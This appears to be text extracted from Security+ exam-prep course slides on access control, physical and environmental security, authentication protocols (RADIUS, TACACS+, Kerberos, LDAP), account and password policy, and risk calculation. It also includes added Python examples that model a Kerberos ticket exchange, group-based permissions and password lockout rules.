• Helps prevent fraud and error
• Split an important job into parts/steps and have them be performed by two or more people
• SoD in IT Security
–Restrict the amount of power held by any one individual
–A different person designs/implements security systems than tests/audits them
–Any single system administrator account should be limited in its abilities
– Least Privilege – each IT person should only have permissions to what they need for their job
Separation of Duties
• An operating system has been tested and is certified to be secure
• Common Criteria (CC)
• International standard ISO/IEC 15408
• A product receives an Evaluation Assurance Level (EAL) after testing
• Also applies to hardware, devices, and software
• For high security environments like government or military
Trusted OS
Key Terms You Should Know
Term Definition
Identification Verifying the true identity of a person
Single Factor Authentication
Using only one type of credentials for authentication
Multifactor Authentication
Using more than one type of credentials for authentication
Biometrics Using a biological trait such as fingerprint as an authentication credential
Key Terms You Should Know
Term Definition
Security Tokens A hardware device used for authentication most often in a challenge-response situation
Smart Cards Hardware cards that include electronics to be scanned or read for access to areas or resources
Common Access Cards US Department of Defense smart cards that are used to access computers and digital signatures
Personal Identification Verification Cards
US Government smart cards used to access buildings and computer systems
Key Terms You Should Know
Term Definition
Mandatory Access Control (MAC)
Inflexible access control that is controlled by administrators
Discretionary Access Control (DAC)
More flexible access control that allows object owners to share access
Role-based Access Control (RBAC)
Access control is based on the roles that a subject belongs to
Rule-based Access Control (RBAC)
Access is defined by a set of rules
Trusted OS
An operating system that meets the Common Criteria's requirements for security at a EAL of 4 or above
Key Terms You Should Know
Term Definition
Permissions, Privileges, or Rights
The level of access granted to users, groups, and roles
Objects
When referring to access control, an object is what we are granting users access to; these can be files, folders, printers, or databases
Subjects
When referring to access control, a subject is who we are granting object access to; these can be people, computers, or processes
What We Covered
Authentication and Authorization
Identification vs. Authentication
Authentication and Authorization
Something You Know, Something You Have, and Something You Are
• Passwords
• Tokens
• Smart Cards
• Common Access Cards (CAC)
• Personal Identification Verification Cards (PIV)
• Biometrics
Single Factor vs. Multifactor Authentication
What We Covered
Policies and Best Practices
Mandatory Vacations
Job Rotation
Separation of Duties
Trusted OS
Access Control
Key Terms You Should Know
Types of Access Control
• Mandatory Access Control (MAC)
• Discretionary Access Control (DAC)
• Role-based Access Control (RBAC)
• Rule-based Access Control (RBAC)
Information Models
Physical and Environmental Security
In This Lesson:
Exam Objectives:
2.6 Explain the impact and proper use of environmental controls
Partial Coverage of 3.6 and 4.2
Physical Security
Fencing
Mantraps
Access List
Proximity Readers
Video Surveillance and Monitoring
Hardware Locks • Cable Locks • Safe • Locking Cabinets
Environmental Security
HVAC
Hot and Cold Aisles
Environmental Monitoring and Controls
• Temperature and Humidity Controls
Fire Suppression
Power Systems
Electromagnetic Emissions
• Interference and Shielding
Physical Security
[Diagram, repeated on the next four slides: a site plan with a fenced perimeter, a server room, a security office, and parking spaces; each slide adds the control being discussed: the fence line, a mantrap with its access list at the entrance, proximity readers (#) on the doors, and surveillance cameras]
Fencing
• The outer layer of physical security
Mantrap
• A small area that limits access to an area or individual
• A person must be allowed through the mantrap by someone with authority
• Access lists specify who is allowed into what areas
Proximity Readers
• Reads the electronic signal from proximity devices
– Electronic ID cards or fobs
• Use Radio Frequency Identification (RFID)
• Can be combined with a PIN or one-time password so that a stolen or cloned card alone is not enough
Video Surveillance and Monitoring
• Closed Circuit television (CCTV)
• Recorded for later review
• May be monitored live
• Cable Locks
– Laptops have a built-in slot meant for cable locks
–Secure a laptop or even a desktop and other devices to the desk
– Lock PC cases to keep people from removing or destroying hard drives and other components
• Safes and Locking Cabinets
–Store backups, documentation, and other important information in a locked cabinet or safe
• Rack mounted servers and appliances should be locked to the racks
• Don’t forget key management!
Hardware Locks
Environmental Security
• Heating, ventilation, and air conditioning
• Server rooms, data centers, and computer labs need extra HVAC considerations
• Extra cooling and heat transfer
–Separate zone or separate system from the rest of the building
• HVAC on at all times – not turned down or off on weekends and holidays
• Contract experts that have experience with computer specific HVAC
HVAC Considerations
[Diagram: four racks on a raised floor with the HVAC unit at one end; cold air is pushed up through the raised floor into the aisles the rack fronts face, and the rack backs exhaust into alternating Hot Aisles that return the warm air to the HVAC]
Hot and Cold Aisles
• Systems for monitoring and alerting on environmental variables
–Temperature
–Humidity
–Moisture
–Dust
–Smoke
–Chemical
• Temperature and humidity controls
–Needed for older systems and larger modern systems like communication equipment and datacenters
– Low humidity causes equipment damaging static shocks
–High humidity causes corrosion
Environmental Monitoring and Controls
• Fire extinguisher
–Portable
–Unplug equipment if possible
Fire Suppression
http://www.usfa.fema.gov
• Fire suppression system
–Built-in and integrated with fire/smoke detectors
–Water-based
• Not preferred for computers
• Should cut the power to computers first
Fire Suppression
Wet pipe: pipes are always full of water, so they could freeze, burst, or leak. Fast acting; no time to stop the system from starting.
Dry pipe: pipes hold pressurized air and fill with water only when a sprinkler head opens, so the pipes remain undamaged. Slower acting; allows time to shut off the valve on a false alarm.
Pre-action: pipes stay dry until a separate detector trips, so the pipes remain undamaged. Slowest acting; gives you time to use an extinguisher on a small fire before the system goes off.
• Fire suppression system
–Built-in and integrated with fire/smoke detectors
–Gas-based
• Safer than water for electronics
• More expensive and more maintenance
• Could harm humans
Fire Suppression
• Surge protector
–Protect electronics from a surge of electricity
–Range in size
• Small for a few devices
• Large for the entire building
–Can protect phone, coaxial, and Ethernet cables as well
–Passively wait for a spike in power
–Often one-time use: the protective components wear out after absorbing a large surge
Power Systems
• Power conditioner
–Actively normalizes and improves the quality of electricity
–Different models do different things
• Regulate power voltage
• Filter noise
• Load balance
• Surge protection
• Battery backup
–Rack sized or building sized
Power Systems
• Backup power
–Uninterruptable Power Supply (UPS)
• Instantaneous protection from power interruptions
• Short term solution
–Backup generators
• Not instantaneous
• Often used in conjunction with backup batteries
• Run on gas or diesel
• Require regular maintenance
Power Systems
• Interference
–EMI: Electromagnetic Interference
• Electronic emissions that interrupt, obstruct, degrade, or desensitize the performance of electronics
–RFI: Radio Frequency Interference
• EMI that is projected across the radio spectrum
– From fluorescent lights, motors, and other outside equipment
–Also from the computer components themselves
Electromagnetic Emissions: Interference and Shielding
• Shielding
–Prevents interference and protects your electronic emissions from being gathered by attackers
–Comes in many forms: spray, tape, filter, cage, and more
• Built into devices and computer components
–TEMPEST-certified systems
• Certified by the government to limit compromising electromagnetic emanations, so the equipment may process classified information
–Shielded Twisted Pair (STP) vs. Unshielded Twisted Pair (UTP)
Electromagnetic Emissions: Interference and Shielding
Electromagnetic Emissions: Interference and Shielding
Best Practices
• Use shielded conduit when running cables
• Do not have communication cables in the same conduit as power cables
• Keep cables away from sources of EMI and RFI
• Use fiber optic cable if possible
Key Terms You Should Know
Term Definition
Electromagnetic Interference (EMI)
Interference caused by the electronic emissions of other devices and cables
Radio Frequency Interference (RFI)
Electrical byproduct that is projected across the radio spectrum
Proximity Reader A device that reads proximity cards or fobs for authentication and entrance into a building or restricted area
Mantrap A small area between two doors that a person cannot get past without authorization
What We Covered
Environmental Security
HVAC
Hot and Cold Aisles
Environmental Monitoring and Controls
• Temperature and Humidity Controls
Fire Suppression
Power Systems
Electromagnetic Emissions
• Interference and Shielding
Physical Security
Fencing
Mantraps
Access List
Proximity Readers
Video Surveillance and Monitoring
Hardware Locks • Cable Locks • Safe • Locking Cabinets
Authentication Services
In This Lesson:
Introduction to Authentication Services
RADIUS
TACACS+
TACACS and XTACACS
Kerberos
LDAP
Exam Objective: 5.1 Explain the function and purpose of authentication services
Partial coverage of 5.2
• Centralizes authentication
–Removes the need for multiple user databases
–Ease of maintenance
–Single Sign-on
• Allows users to log in from different places and through different means
– Internal clients
–Remote clients
–Mobile devices
Introduction to Authentication Services
• Widely used
–Used by internet service providers (ISP)
• Every network access server relies on a central authentication server
–Used by corporate networks
• Every resource, storage, and application server uses a single authentication service
• Offers more than just authentication
–Who you are? (Authentication)
–What you are allowed to access? (Authorization)
–What you did? (Accounting)
Introduction to Authentication Services
• Remote Authentication Dial-in User Service
• Does authentication, authorization, and accounting
–Authentication and authorization together
–Accounting separate
• Consolidates authentication of dispersed users onto a centralized server
• Flexible: works with varied systems and protocols
–Can use PPP, CHAP, PAP, EAP, and UNIX login
• UDP ports 1812 and 1813 (connectionless)
–1812 for authentication and authorization
–1813 for accounting
–Or the older, unofficial ports 1645 and 1646, still found on some equipment
RADIUS
RADIUS exchange
1. User initiates a connection to the NAS
2. NAS asks the user for credentials
3. User replies with credentials
4. NAS sends an Access-Request to the RADIUS server
5. RADIUS server responds with Access-Accept or Access-Reject (or Access-Challenge if another round is needed)
The NAS and the RADIUS server share a secret key; it authenticates the server's replies and hides the User-Password attribute, but it does not encrypt the rest of the packet.
RADIUS
Security Concerns
•Sniffing – Only the User-Password attribute is obfuscated; the rest of the client/server packet, including user names and accounting data, is sent in clear text
– Client/user communication vulnerable depending on implementation
•Spoofing
•Denial-of-Service
•Replay attacks
•MD5 associated vulnerabilities
Mitigations
•Harden the RADIUS server
•Tunnel it inside another protocol such as IPsec or TLS (RADIUS over TLS, "RadSec") to layer on protection
•Choose unique shared secrets for each NAS
• Terminal Access Controller Access Control System Plus
• Newest protocol based on TACACS
• Does authentication, authorization, and accounting separately
• Encrypts not just the users password but the entire payload
• TCP port 49 (connection-oriented)
• Developed by Cisco (originally proprietary; the protocol was later published openly as an informational RFC)
• Works well with router management and terminal services
TACACS+
TACACS+ Weaknesses
• The payload protection is an MD5-derived keystream (obfuscation rather than strong encryption), and packet headers are always in clear text
• Limited integrity checking, so accounting records can be forged or altered
• Older version of TACACS
• Considered end-of-maintenance
• TACACS
–Had authentication and authorization in a combined process
–Used connectionless UDP
–Did not offer accounting
–Did not support multifactor authentication
• XTACACS (Extended TACACS)
–Separated authentication and authorization
–Had less granular accounting processes
–Used connectionless UDP
TACACS and XTACACS
• Network authentication
–Works with multiple OS’s
• Single Sign-on (SSO)
–A user signs on once and all resource access is based on that logon
• Mutual authentication possible
• All authentication transactions are protected: passwords never cross the network, and the client proves it knows its key by decrypting the KDC's reply
• 3 heads of mythical Kerberos: the client, the application server, and the trusted third party, the Key Distribution Center (KDC)
–The KDC holds the Authentication Server (AS)
–and the Ticket Granting Server (TGS)
• Tickets and sessions are time-sensitive
Kerberos
Kerberos exchange
1. Principal presents credentials to the AS and requests a Ticket Granting Ticket (TGT)
2. AS responds with the TGT (encrypted with the TGS's key) and a session key for the TGS (encrypted with the principal's key)
3. Principal presents the TGT plus an authenticator to the TGS and requests a Service Ticket for the application server
4. TGS responds with the Service Ticket (encrypted with the application server's key) and a session key for that service
5. Principal presents the Service Ticket and a fresh authenticator to the Application Server
6. Data transfer (after the server optionally proves itself back, giving mutual authentication)
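The exchange above, carried out end to end as an added example (this is not code from the course or from any Kerberos implementation). It models the AS and TGS inside one KDC, an application server that never talks to the KDC, and the two time checks that make tickets and authenticators time-sensitive. The cipher is a deliberately simple hash-based construction so the block runs offline; Kerberos itself uses AES-based encryption types. The 5-minute skew, 10-hour ticket lifetime, principal names and passwords are assumptions for the example.

```python
import hashlib
import hmac
import json
import os
import time

# Policy values assumed for this example (MIT Kerberos ships with similar defaults)
MAX_CLOCK_SKEW = 300            # seconds an authenticator's timestamp may be off
TICKET_LIFETIME = 10 * 3600     # seconds a TGT or service ticket stays valid


def derive_key(password: str, salt: str) -> bytes:
    """Long-term key for a principal; the password itself never crosses the wire."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), 100_000)


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    return b"".join(hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
                    for i in range(length // 32 + 1))[:length]


def seal(key: bytes, obj: dict) -> bytes:
    """Toy authenticated encryption built from hashlib/hmac only, standing in for
    Kerberos' real AES encryption types so the example runs offline. Not for production."""
    pt, nonce = json.dumps(obj).encode(), os.urandom(16)
    ct = bytes(p ^ k for p, k in zip(pt, _keystream(key, nonce, len(pt))))
    return nonce + ct + hmac.new(key, nonce + ct, "sha256").digest()


def unseal(key: bytes, blob: bytes) -> dict:
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(key, nonce + ct, "sha256").digest(), tag):
        raise ValueError("decryption failed: wrong key or tampered data")
    return json.loads(bytes(c ^ k for c, k in zip(ct, _keystream(key, nonce, len(ct)))).decode())


class KDC:
    """Key Distribution Center: holds the AS and TGS and every principal's long-term key."""

    def __init__(self, keys: dict):
        self.keys = keys                              # principal name -> long-term key

    def as_exchange(self, client: str, preauth: bytes, now: float):
        # AS: the encrypted timestamp proves the client knows its key without sending it
        if abs(now - unseal(self.keys[client], preauth)["timestamp"]) > MAX_CLOCK_SKEW:
            raise PermissionError("pre-authentication timestamp outside allowed skew")
        skey, expires = os.urandom(32).hex(), now + TICKET_LIFETIME
        tgt = seal(self.keys["krbtgt"], {"client": client, "key": skey, "expires": expires})
        return seal(self.keys[client], {"key": skey, "expires": expires}), tgt

    def tgs_exchange(self, tgt: bytes, authenticator: bytes, service: str, now: float):
        # TGS: only the KDC can open the TGT; the authenticator proves the client holds the session key
        t = unseal(self.keys["krbtgt"], tgt)
        if now > t["expires"]:
            raise PermissionError("TGT expired")
        a = unseal(bytes.fromhex(t["key"]), authenticator)
        if a["client"] != t["client"] or abs(now - a["timestamp"]) > MAX_CLOCK_SKEW:
            raise PermissionError("bad authenticator")
        svc_key = os.urandom(32).hex()
        ticket = seal(self.keys[service],
                      {"client": t["client"], "key": svc_key, "expires": now + TICKET_LIFETIME})
        return seal(bytes.fromhex(t["key"]), {"key": svc_key, "service": service}), ticket


def service_accept(service_key: bytes, ticket: bytes, authenticator: bytes, now: float) -> str:
    """Application server: never contacts the KDC; it trusts the ticket because only the KDC could seal it."""
    t = unseal(service_key, ticket)
    if now > t["expires"]:
        raise PermissionError("service ticket expired")
    a = unseal(bytes.fromhex(t["key"]), authenticator)
    if a["client"] != t["client"] or abs(now - a["timestamp"]) > MAX_CLOCK_SKEW:
        raise PermissionError("bad authenticator")
    return t["client"]


def login_and_access(kdc: KDC, user: str, password: str, service: str, service_key: bytes,
                     now: float = None, present_after: float = 0.0) -> str:
    """Whole client flow. present_after delays the final step so an expired ticket can be shown."""
    now = time.time() if now is None else now
    ukey = derive_key(password, user)
    enc_part, tgt = kdc.as_exchange(user, seal(ukey, {"timestamp": now}), now)
    skey = bytes.fromhex(unseal(ukey, enc_part)["key"])           # wrong password fails here
    enc_svc, ticket = kdc.tgs_exchange(tgt, seal(skey, {"client": user, "timestamp": now}), service, now)
    svc_key = bytes.fromhex(unseal(skey, enc_svc)["key"])
    later = now + present_after
    return service_accept(service_key, ticket, seal(svc_key, {"client": user, "timestamp": later}), later)
```

Two things worth noticing when running it: a wrong password is rejected by the client's own decryption of the AS reply (the KDC never sees the password), and a ticket presented after its lifetime is refused by the application server without any round trip to the KDC.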
• Lightweight Directory Access Protocol
• Directory services queries (and modifications) made over an IP network
• X.500 directory
–A set of objects with attributes
–Organized in a hierarchical structure
–Examples:
• Microsoft Active Directory
• Novell eDirectory
• TCP/UDP port 389
–Other ports/services work with LDAP
LDAP
LDAP Distinguished Names
dc=globomantics,dc=local
  ou=locations
    ou=chicago
      ou=computers
      ou=users
        cn=hackmann
    ou=new york
      ou=computers
      ou=users
        cn=eliberman
DN: cn=hackmann,ou=users,ou=chicago,ou=locations,dc=globomantics,dc=local
LDAP
Security Concerns
•No security by itself – a simple bind sends the DN and password in clear text
– The Simple Authentication and Security Layer (SASL) adds stronger mechanisms, such as Kerberos through GSSAPI, that do not expose the password
Mitigations
•Harden LDAP servers
•Use SASL
•Use LDAP over SSL/TLS (LDAPS)
•Block port 389 (and 636 for LDAPS) at the border firewall; only internal clients should reach the directory
Key Terms You Should Know
Term Definition
Remote Authentication Dial-in User Service
(RADIUS)
A standard protocol for providing AAA services that uses UDP and combines authentication and authorization
Network Access Server/Remote Access Server
(NAS/RAS)
The client of the RADIUS or TACACS+ server. A user communicates with this server instead of directly with the authentication server
Terminal Access Controller Access Control System Plus
(TACACS+)
A Cisco-developed protocol for providing AAA services that uses TCP, separates authentication and authorization, and protects the whole packet body
Extended Terminal Access Controller Access Control
System (XTACACS)
An older version of TACACS that had limited accounting functionality
Key Terms You Should Know
Term Definition
Terminal Access Controller Access Control System
(TACACS)
The original TACACS that used UDP and had no accounting
Kerberos A strongly encrypted network authentication protocol that offers a single sign-on for all network resources
Key Distribution Center (KDC)
A component of the Kerberos system that includes the AS for authentication and TGS for secure distribution of keys
Authentication Server/Service (AS)
A component of the Kerberos system that handles authentication
Key Terms You Should Know
Term Definition
Ticket Granting Server/Service (TGS)
A component of the Kerberos system that issues service tickets and session keys to principals holding a valid TGT
Single Sign-on (SSO) A user only needs to enter one set of credentials one time and can access all authorized resources and applications
Lightweight Directory Access Protocol (LDAP)
A directory services protocol used to access and modify X.500-style hierarchical directories across a TCP/IP network
Distinguished Name (DN) The unique name given to a directory object based on its location in the hierarchy
What We Covered
Introduction to Authentication Services
RADIUS
TACACS+
TACACS and XTACACS
Kerberos
LDAP
User Account Management
In This Lesson:
Exam Objective: 5.3 Implement appropriate security controls
when performing account management
Privilege Management
• User Assigned Privileges
• Group Based Privileges
User Account Policy
• Users with Multiple Accounts/Roles
• System/Administrator Accounts
• Logon Time Restrictions
• Temporary Access
• Account Disablement
Password Policies
• Complexity and Length
• Expiration
• Recovery
• Lockout
• Administering which resources and data are available to users and groups within an organization
• User assigned privileges
–Privileges are granted specifically and individually for each user
–Not scalable
–Difficult to make global changes
• Group based privileges
–User privileges are inherited from the group
–Can be as simple as locations or departments
–Can be very granular and have a group for each job role (Role-based management)
• Users can be members of multiple groups
Privilege Management
Group Based Privileges
[Diagram 1: one Accounting Department Group containing the Accounts Payable, Accounts Receivable, and Accounting Managers users; the group is granted Full Access to one of the AR Resource and AP Resource and Read Only to the other, so every member gets the same rights]
[Diagram 2: the same users split into an Accounts Payable Group, an Accounts Receivable Group, and an Accounting Managers Group nested under the Accounting Department Group; each group is granted Full Access or Read Only to the AR Resource and the AP Resource separately, so permissions follow the job role]
• Users with multiple accounts/roles
–Create separate accounts for administration and regular use
• Only use an admin account for doing admin tasks
• The user must have different passwords for each account
– Even for accounts outside the company
• Requiring multifactor authentication on the admin account keeps a leaked everyday password from opening it
–When separation of duties is not needed
• Add users to multiple groups depending on their roles
• Understand how conflicting permissions are handled
User Account Policy
• System/administrator accounts
–Do not have accounts that have company wide administrative privileges
–Give admin accounts only the privileges they need
• Logon time restrictions
– Limits the window in which an attacker can use a stolen account (for example, no logons outside business hours)
• Temporary Access
–Grant least privileges
–Set the expiration date
User Account Policy
• Add users to groups
• Assign permissions to groups
• Configure time of day restrictions
• Create a temporary account and set it to expire
Microsoft Active Directory Users and Groups Demonstration
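The demonstration above is done in the Active Directory console; the following is an added example (not the course's code) that shows the same decisions as a small access-control engine: nested group membership resolved transitively, an explicit deny overriding any allow (the way NTFS resolves conflicting permissions), and the account-policy checks from this lesson (disabled, expired, inactive, outside logon hours) evaluated before any permission is consulted. The users, groups, ACLs, hours and dates are constructed sample data.

```python
from datetime import datetime, timedelta

# --- constructed sample directory (not from the course) ---
GROUPS = {   # group -> (direct user members, nested groups)
    "Accounting Department": (set(), {"Accounts Payable", "Accounts Receivable", "Accounting Managers"}),
    "Accounts Payable":      ({"bob"}, set()),
    "Accounts Receivable":   ({"carol"}, set()),
    "Accounting Managers":   ({"dana"}, set()),
    "Contractors":           ({"tempjoe"}, set()),
}
# resource -> (principal, permission, allow?) entries; an explicit deny always wins
ACLS = {
    "AR Resource": [("Accounting Department", "read", True), ("Accounts Receivable", "write", True),
                    ("Accounting Managers", "write", True), ("Contractors", "read", True)],
    "AP Resource": [("Accounting Department", "read", True), ("Accounts Payable", "write", True),
                    ("Accounting Managers", "write", True), ("tempjoe", "read", False)],
}
ACCOUNTS = {   # enabled flag, expiry, permitted logon hours on weekdays, last successful logon
    "bob":     {"enabled": True, "expires": None, "hours": (8, 18), "last_logon": datetime(2024, 3, 1)},
    "carol":   {"enabled": True, "expires": None, "hours": (8, 18), "last_logon": datetime(2024, 3, 1)},
    "dana":    {"enabled": True, "expires": None, "hours": (7, 20), "last_logon": datetime(2024, 3, 1)},
    "tempjoe": {"enabled": True, "expires": datetime(2024, 3, 15), "hours": (8, 18),
                "last_logon": datetime(2024, 3, 1)},
    "erin":    {"enabled": True, "expires": None, "hours": (0, 24), "last_logon": datetime(2023, 11, 1)},
}
INACTIVITY_LIMIT = timedelta(days=90)      # assumed policy value


def ts(value: str) -> datetime:
    """Parse an ISO-8601 timestamp such as '2024-03-05T10:00'."""
    return datetime.fromisoformat(value)


def effective_groups(user: str) -> set:
    """Direct groups plus every group that nests them, transitively."""
    result = {g for g, (members, _) in GROUPS.items() if user in members}
    changed = True
    while changed:
        changed = False
        for group, (_, nested) in GROUPS.items():
            if group not in result and nested & result:
                result.add(group)
                changed = True
    return result


def effective_permissions(user: str, resource: str) -> set:
    """Union of allows for the user and all effective groups, minus any explicit deny."""
    principals = effective_groups(user) | {user}
    entries = ACLS.get(resource, [])
    allowed = {perm for who, perm, ok in entries if ok and who in principals}
    denied = {perm for who, perm, ok in entries if not ok and who in principals}
    return allowed - denied


def account_allowed(user: str, now: datetime):
    """Account-policy gate, checked before any permission is considered."""
    acct = ACCOUNTS.get(user)
    if acct is None or not acct["enabled"]:
        return False, "account missing or disabled"
    if acct["expires"] is not None and now >= acct["expires"]:
        return False, "account expired"
    if now - acct["last_logon"] > INACTIVITY_LIMIT:
        return False, "account inactive; disabled pending review"
    start, end = acct["hours"]
    if now.weekday() > 4 or not (start <= now.hour < end):
        return False, "outside permitted logon hours"
    return True, "ok"


def decide(user: str, resource: str, permission: str, when: str):
    """Full decision: (allowed, reason) for a user asking for a permission at a time."""
    now = ts(when)
    ok, reason = account_allowed(user, now)
    if not ok:
        return False, reason
    if permission not in effective_permissions(user, resource):
        return False, "permission not granted"
    return True, "ok"
```

Note the ordering: the policy checks refuse an expired or out-of-hours account even when its group memberships would grant the permission, which is what makes logon time restrictions and expiration dates useful against a stolen credential.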
• Account disablement
–Account expiration
• Temporary or guest accounts can be set to automatically expire
– Inactive accounts
• Accounts are configured to be disabled automatically if they are inactive for a period of time
– Even accounts that are not set to expire
–User account and data deletion policy
• Deleting an account (rather than disabling it) breaks the audit trail
• Transfer the user's data first, including encryption keys, or encrypted data becomes unrecoverable
User Account Policy
• Complexity and Length
–At least 8 characters (longer is better)
–Must include uppercase and lowercase letters
–Must include at least one number or special character
• Expiration
–Passwords expire at a regular interval
–Require passwords to be different from the password history
Password Policies
• Recovery/Reset
– Identification and/or authentication should happen as part of the reset process
• Lockout
–Account lockout threshold for failed logon attempts
–Thoroughly plan your lockout policy, since an attacker can deliberately lock accounts out (denial of service)
• Cached credentials and service accounts with a stale password can trip the threshold on their own
• Educate users on protecting their password and choosing strong passwords
Password Policies
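The four password-policy elements from this lesson (complexity and length, expiration with history, reset-safe storage, and lockout) implemented together as an added example; this is not code from the course or from any directory product. The policy numbers (8 characters, 90-day age, 5-deep history, 5 failures in a 30-minute window, 15-minute lockout) and the sample user are assumptions chosen for the example.

```python
import hashlib
import hmac
import os
import re
from datetime import datetime, timedelta

# Policy values assumed for this example
MIN_LENGTH = 8
MAX_AGE = timedelta(days=90)
HISTORY_DEPTH = 5
LOCKOUT_THRESHOLD = 5
LOCKOUT_WINDOW = timedelta(minutes=30)     # failures older than this no longer count
LOCKOUT_DURATION = timedelta(minutes=15)


def ts(value: str) -> datetime:
    """Parse an ISO-8601 timestamp such as '2024-01-01T09:00'."""
    return datetime.fromisoformat(value)


def check_complexity(password: str, username: str = "") -> list:
    """Return the list of violated rules; an empty list means the password passes."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if not (re.search(r"[a-z]", password) and re.search(r"[A-Z]", password)):
        problems.append("needs both uppercase and lowercase letters")
    if not (re.search(r"[0-9]", password) or re.search(r"[^A-Za-z0-9]", password)):
        problems.append("needs at least one number or special character")
    if username and username.lower() in password.lower():
        problems.append("contains the user name")
    return problems


def hash_password(password: str, salt: bytes = None) -> bytes:
    """Salted PBKDF2 so that neither the current password nor the history is stored in the clear."""
    salt = salt or os.urandom(16)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


def verify_password(password: str, stored: bytes) -> bool:
    return hmac.compare_digest(hash_password(password, stored[:16]), stored)


class Account:
    def __init__(self, username: str, password: str, now: datetime):
        self.username = username
        self.history = []            # most recent first; salted hashes only
        self.changed_at = None
        self.failures = []           # timestamps of recent failed attempts
        self.locked_until = None
        self.set_password(password, now)

    def set_password(self, new_password: str, now: datetime) -> None:
        """Enforces complexity and the password history; raises ValueError with every violation."""
        problems = check_complexity(new_password, self.username)
        if any(verify_password(new_password, h) for h in self.history):
            problems.append(f"matches one of the last {HISTORY_DEPTH} passwords")
        if problems:
            raise ValueError("; ".join(problems))
        self.history = [hash_password(new_password)] + self.history[:HISTORY_DEPTH - 1]
        self.changed_at = now

    def is_expired(self, now: datetime) -> bool:
        return now - self.changed_at >= MAX_AGE

    def login(self, password: str, now: datetime) -> str:
        """Returns 'ok', 'expired', 'bad password' or 'locked' so the caller can log it."""
        if self.locked_until is not None and now < self.locked_until:
            return "locked"
        self.failures = [t for t in self.failures if now - t <= LOCKOUT_WINDOW]
        if verify_password(password, self.history[0]):
            self.failures = []
            return "expired" if self.is_expired(now) else "ok"
        self.failures.append(now)
        if len(self.failures) >= LOCKOUT_THRESHOLD:
            self.locked_until = now + LOCKOUT_DURATION
            self.failures = []
            return "locked"
        return "bad password"
```

The lockout window is what keeps a slow guessing attack from flying under the threshold, and the automatic unlock after LOCKOUT_DURATION is what limits the denial-of-service an attacker gets by deliberately locking someone out; a service account or cached credential replaying a stale password will hit exactly this code path, which is why the slide says to plan the policy carefully.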
User Best Practices for Passwords
Protecting Your Passwords
• Never tell your password to anyone
– Emails asking for your password are fraudulent
• Do not write passwords down
– If you must write them down, store the paper in a secure place (not tacked to your bulletin board) and destroy it (not just throw it away) once you have memorized it
• Change your password immediately if you suspect it has been compromised
• Use a different password for every account
– Using the same password means that if someone gets the password for one of your accounts, it can be used on your other accounts too
• Do not let applications like web browsers store important passwords. If your computer is compromised then those passwords are available to the attacker
• Be sure you are entering your password into the real website (not a faked version) every time
• Create strong passwords
User Best Practices for Passwords
Creating Strong Passwords
• Should be at least 8 characters in length – longer for more important accounts
• Should include numbers and special characters
– Should not be numbers associated with you like your address
– Special characters are not numbers or letters. Examples are *, &, $, _
– Consider placing your special characters in the middle of the password instead of as the last character
– Don’t just replace a letter with a common special character replacement like replacing S with $ or O with 0
• If passwords are case sensitive, use a combination of upper and lowercase letters
– Put uppercase letters in the middle of the password, not just as the first or last character
User Best Practices for Passwords
Creating Strong Passwords
• Should not be a single real (dictionary) word
– It should not include names of your pets or family members
• The best method for creating a seemingly random, strong password is to use a string of characters that corresponds with a phrase that helps you remember it
– Password: i8ccc&T4b
– Reminder Phrase: I ate chocolate chip cookies and tea for breakfast
Key Terms You Should Know
Term Definition
User Assigned Privileges The data and resources that users are allowed to access and change are set on a user-by-user basis
Group Based Privileges
Users are grouped together by a common criteria. Privileges are set for the group and the users inherit the group privileges
What We Covered
Privilege Management
• User Assigned Privileges
• Group Based Privileges
User Account Policy
• Users with Multiple Accounts/Roles
• System/Administrator Accounts
• Logon Time Restrictions
• Temporary Access
• Account Disablement
Password Policies
• Complexity and Length
• Expiration
• Recovery
• Lockout
Risk Management
In This Lesson:
Exam Objective: 2.1 (Partial) Explain risk related concepts
3.7 (Partial) Implement assessment tools and techniques to discover security threats and vulnerabilities
Risk Management Vocabulary
• Asset
• Vulnerability
• Threat
• Risk
• Impact
• Qualitative Assessment
• Quantitative Assessment
Risk Calculation
• Impact Analysis
• Threat vs. Likelihood
• Annualized Loss Expectancy (ALE)
Options for Handling Risk
• Risk-avoidance
• Transference
• Acceptance
• Mitigation
• Deterrence
Control Types
• Technical
• Management
• Operational
Risk Management Vocabulary
• Asset
–What we are trying to protect: people, property, information, and reputation
• Vulnerability
–A flaw, weakness, or gap that can be exploited by threats to gain unauthorized access to an asset
• Threat
–Something that can exploit a vulnerability and can potentially cause loss/harm to assets
• Risk
–The possibility of damage, destruction, or theft of an asset
Risk Management Vocabulary
• Impact
– The result of a risk
• Qualitative Assessment
– An assessment based on the sensitivity of an asset
– Assigns a weight, grade, or class to an asset instead of a dollar amount
• Quantitative Assessment
– An assessment based on the monetary worth of an asset
– Calculates the cost impact of an incident
Risk Management Steps
1. Asset Identification
2. Threat and Vulnerability Assessment
3. Risk Calculation
4. Mitigation and Deterrence
5. Evaluation
• What properties, belongings, resources, data, systems, and people does a company possess?
• Inventory and prioritize
• Which assets have the most value? (Quantitative)
• Which assets are most important? (Qualitative)
–Mission critical
– Irreplaceable
• Once assets are identified, it can be determined what risks could affect them and what the impact would be
Asset Identification
Threat and Vulnerability Assessment
• Methods
– Interviews
–Evaluations
–Penetration testing
–Vulnerability scanning
• Prioritize
• Coordinate with business impact analysis
• Determine the impact of a successful exploitation of a vulnerability
• For all assets
–Theft, loss, damage of asset
• For IT systems
– Loss of confidentiality, integrity, and/or availability
Impact Analysis
Impact Level | Tangible Assets and Resources | Intangible: Mission, Reputation, Interest | Human Assets
Low | Some loss | Notable | --
Moderate | Costly | Violate, harm, or impede | Injury
High | Very costly | Significantly violate, harm, or impede | Serious injury or death
Risk Calculation
Risk Calculation: Threat vs. Likelihood
Threat
• An event that intentionally or accidentally exploits a vulnerability
• Steals, damages, or destroys an asset
Likelihood
• What are the chances that the threat will take place?
• Rated high, moderate, or low (qualitative) or as an annualized rate of occurrence (quantitative)
Asset Value (AV): How much money something is worth
Exposure Factor (EF): The proportion of the asset's value lost in a single incident, normally a percentage; in this lesson's example the hours of outage serve as the multiplier
Single Loss Expectancy (SLE): How much is estimated to be lost on a single occurrence of a given risk. AV x EF = SLE
